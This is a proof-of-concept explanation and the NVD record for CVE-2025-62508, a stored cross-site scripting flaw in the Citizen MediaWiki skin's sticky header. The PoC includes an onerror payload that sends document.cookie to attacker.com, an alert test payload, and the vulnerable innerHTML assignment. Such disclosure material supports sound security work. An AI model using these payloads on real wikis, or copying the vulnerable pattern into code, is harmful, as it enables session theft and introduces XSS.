CVE-2025-62508

<!-- PoC for CVE-2025-62508 - Citizen MediaWiki Skin Stored XSS Vulnerability: innerHTML assigned from textContent in copyButtonAttributes function Affected file: stickyHeader.js Affected messages: citizen-share, citizen-view-history, citizen-view-edit, nstab-talk --> // Step 1: Attacker with editinterface permission edits MediaWiki system message // For example, edit the page: MediaWiki:citizen-share // Set the content to a malicious payload that will be HTML-escaped upon saving // but interpreted as HTML when rendered via innerHTML // Example malicious content for MediaWiki:citizen-share: // <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> // When MediaWiki saves this, it HTML-escapes the content to: // &lt;img src=x onerror=&quot;fetch('https://attacker.com/steal?cookie='+document.cookie)&quot;&gt; // Step 2: The vulnerable code in stickyHeader.js executes: function copyButtonAttributes(sourceElement, targetElement) { // Vulnerable line: textContent returns decoded HTML entities const labelText = sourceElement.textContent; // innerHTML interprets the decoded content as HTML targetElement.innerHTML = labelText; } // Step 3: When any user visits a page with Citizen skin, // the sticky header renders the button with the malicious script // The browser parses the innerHTML content as actual HTML, // triggering the onerror event handler // Step 4: The attacker's server receives the victim's session cookie // or performs other malicious actions // Verification PoC (simpler test payload): // Set MediaWiki:citizen-share to: <svg onload=alert(document.domain)> // After saving (HTML-escaped): &lt;svg onload=alert(document.domain)&gt; // When rendered in sticky header: alert(document.domain) executes

{"cve": {"id": "CVE-2025-62508", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:36.587", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Citizen is a MediaWiki skin that makes extensions part of the cohesive experience. Citizen from 3.3.0 to 3.9.0 are vulnerable to stored cross-site scripting in the sticky header button message handling. In stickyHeader.js the copyButtonAttributes function assigns innerHTML from a source element’s textContent when copying button labels. This causes escaped HTML in system message content (such as citizen-share, citizen-view-history, citizen-view-edit, and nstab-talk) to be interpreted as HTML in the sticky header, allowing injection of arbitrary script by a user with the ability to edit interface messages. The vulnerability allows a user with the editinterface right but without the editsitejs right (by default the sysop group has editinterface but may not have editsitejs) to execute arbitrary JavaScript in other users’ sessions, enabling unauthorized access to sensitive data or actions. The issue is fixed in 3.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/e006923c6dbf113c9a025ca186ecc09fe7b93a15", "source": "[email protected]"}, {"url": "https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/fbb1d4fe9627281567706f3f6fc99a42ce16fdc4", "source": "[email protected]"}, {"url": "https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-g955-vw6w-v6pp", "source": "[email protected]"}]}}